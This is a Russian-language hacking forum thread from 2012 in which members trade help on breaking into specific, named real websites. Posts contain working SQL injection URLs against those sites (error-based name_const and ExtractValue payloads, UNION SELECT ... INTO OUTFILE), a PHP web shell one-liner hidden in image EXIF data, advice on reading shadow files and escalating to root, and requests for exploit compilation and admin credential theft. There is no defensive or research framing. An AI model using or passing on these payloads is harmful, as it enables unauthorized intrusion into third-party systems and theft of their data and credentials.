Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    и так пробовал не получается
     
  2. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    во первых: кодирование ковычек нельзя использовать в INTO OUTFILE. Ибо мускул требует строку, а следовательно должны быть кавычки. Не путайте то, что выдает мускул в выводе - там где можно делать тот же хекс и то что на инпуте попадает в сам мускул.
    Далее: Права на директории только самым непосредственным методом можно узнать - пробовать в них заливать. Конечно есть ряд стандартных директорые имеют больший шанс иметь права на запись как -то : /temp,/upload etc. Но! Смотрите сразу под каким юзером живет веб-сервер и используется ли UID-GID(suexec, ITK etc). Могут иметь место ситуации , когда сам PHP может иметь полный доступ к директориям и папкам, а USER MYSQL через которого ты делаешь OUTFULE - нет.

    Ищи интерфейсы для работу с mysql , а-ля PHPMYADMIN. Проверяй удаленный коннект, пробуй через reverse-IP.
     
    1 person likes this.
  3. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    53
    Likes Received:
    5
    Reputations:
    -4
    Вот такое я нашел в файле shadow. Кто мне объяснит что это, и что с этим можно сделать.

    Я так понял там пароли, и еще что-то. Вот там вторая строчка, на месте хеша звездочка, это значит любой пароль? Пользователей много, как мне определить кто из них рут, и как мне впоследствии войти под ним?
     
  4. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    736
    Likes Received:
    73
    Reputations:
    19
    root как правило имеет uid 0
    user имя пользователя
     
  5. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    53
    Likes Received:
    5
    Reputations:
    -4
    А, вспомнил!
    su username


    Выполняю, но мне пишет вот это:
    --------------

    Я не могу зайти под другим пользователем... Что делать?

    Откомпилируйте кто-нибудь вот этот сплоит - http://www.1337day.com/exploits/17158
     
    #20165 kise, 17 Apr 2012
    Last edited: 17 Apr 2012
  6. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Судя по всему через backconnect ?
    Это означает, что текущая сессия не привязана к псевдотерминалу. Пробуй ssh youruser@localhost. Но не файт что получится, так как есть ряд граничных условий.
     
  7. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    53
    Likes Received:
    5
    Reputations:
    -4
    нет, к сожалению
     
  8. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    Блин ничего не получатся вообще
     
  9. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    178
    Likes Received:
    11
    Reputations:
    1
    http://www.girlsweb.org/registerNew.php
    поле email и username вроде как уязвимы...получилось раскрутить только как blind-sql inj...возможно ли с 1-2 запросов залить шелл?

    magic_quotes_gpc = On
     
    #20169 HeaVeNSeR, 18 Apr 2012
    Last edited: 18 Apr 2012
  10. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    http://allinstyle.ru/?index.php'or(select*from(select(name_const(versio n(),1)),name_const(version(),1))a)and(1)='1

    http://discoverytravel.ru/next.php?pid=2'or(select*from(select(name_const(ve rsion(),1)),name_const(version(),1))a)and(1)='1

    Видно в ОПЕРЕ.

    Вот подобного рода инъекции с запретами на пробелы, кроме версии базы, можно что-нибудь выводить? Tiger ответил, спасибо ему, но а как дальше? мануалы предательски молчат. пичалька.

    Они вообще юзабельны? Или ограничиваться номером версии это уже найс? :D
     
    #20170 asiaman, 18 Apr 2012
    Last edited: 18 Apr 2012
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    asiaman
    Версия >= 5.1, поэтому можно использовать ф-цию ExtractValue, через которую можно вывести уже все ;)
    http://allinstyle.ru/?index.php'AND(extractvalue(1,concat(0x3a,version())))and'1

    Ну или:
    https://rdot.org/forum/showpost.php?p=20287&postcount=12
     
    #20171 Tigger, 18 Apr 2012
    Last edited: 18 Apr 2012
    2 people like this.
  12. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    Про ф-цию ExtractValue, спасибо. Она работает в старших версиях.

    Но вот в http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'1 как быть?

    Вариант
    Code:
    предложил использовать `` в name_const 
    в
    Code:
    1'and(1)=(select*from(select*from(information_schema.tables`a`)JOIN(information_schema.tables`b`)using(TABLE_CATALOG,TABLE_SCHEMA))c)='1
    выдает ошибку.

    З.Ы. Ваши ответы я вообще себе в блокнот сразу копирую. Очень полезные, уникальны (по крайней мере для меня) и часто универсальные. ;) Спасибо.

    ________________________________________________

    Например, если ругается на этот символ ` , т.е. https://rdot.org/forum/showpost.php?p=20287&postcount=12 не проходит в запросе этот символ. На что можно его заменить?
     
    #20172 asiaman, 18 Apr 2012
    Last edited: 18 Apr 2012
  13. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    asiaman
    Там же написано. Запросы надо посылать не через браузер.
    Результат:
    Ошибка при работе с базой данных. Пожалуйста, обратитесь к администратору.<br />Duplicate column name 'TABLE_NAME'

    Данная реализация не идеальна, но имеет место быть.

    В твоих скулях не получиться много чего извлечь даже через ExtactValue, т.к. limit'ом без пробелов пользоваться нельзя, а без limit'ов будет FAIL (при выдергивании инфы из табличек).
     
  14. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    tnx
    а как Вам такая реализация?

    1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x257573657225)and(da ta_length>0)))))='1

    в смысле используя like и data_length
     
  15. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    http://allinstyle.ru/?index.php1'or(ExtractValue(1,concat(0x3a,(select(concat(table_schema,'.',table_name))from(information_schema.tables)where(table_name)like('TABLE%')))))='1

    error - Subquery returns more than 1 row

    http://allinstyle.ru/?index.php1'or(ExtractValue(1,concat(0x3a,(select(concat(table_schema,'.',table_name))from(information_schema.tables)where(table_name)like('VIEWS%')))))='1

    error - XPATH syntax error: ':information_schema.VIEWS'

    Опять же, все упирается в LIMIT.
     
  16. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    от части. оператор like - это смысловой оператор. но с грехом по пополам - можно работать. хотя, я посмотрю. где-то увидел интересный шаблон, там через chr обходит все и даже пробелы работают.
    __________
    погарячился.
    Code:
    You don't have permission to access
     
    #20176 asiaman, 18 Apr 2012
    Last edited: 18 Apr 2012
  17. Mr.Snuffer

    Mr.Snuffer Member

    Joined:
    2 Jul 2010
    Messages:
    149
    Likes Received:
    13
    Reputations:
    0
    Посоны, 403 на union
    Способы обойти есть, или забыть?
     
  18. fiin

    fiin New Member

    Joined:
    25 Jan 2012
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Помогите пожалуйста с WP 2.9.2
    при переходе на _tp://www.site.com/?p=0 открывает главную страницу, но url в строке не меняется на _tp://www.site.com/
    А при переходе на _tp://www.site.com/?p=1 выдаёт
    и
    как мне подобраться к базе, вытащить лог. пасс. админа? Заранее спасибо
     
  19. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    Вопрос следующего плана: заливка шелла через картинку.

    Скрипт только переименовывает файлы в порядковый_номер.jpg Изменить расширение не представляется возможным. Далее через exif pilot по очереди в модель камеры, коменты и др. вставлял <?system($_GET[cmd])?> и подобные вариации. при запросе phpinfo - никакой реакции и ни в одном случае. Хотя коменты, шелл в самом файле - не режуться. просто переименовываются. В случае вызова шелла с расширением jpg - пишет - invalid format bla bla。В случае - картинка + комменты = просто картинка(( запрос: site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo(); - вывод: только картинка.

    Залить .htaccess не получиться. Двиг самописный. В админке функций, что кот наплакал.

    Прошу подсказать варинты. Или забить?
     
  20. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user
    http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27/var/www/properm.ru/htdocs/1.txt%27--+
    http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27tmp/1.txt%27--+

    что не так?Помогите докрутить.
     
Loading...
Thread Status:
Not open for further replies.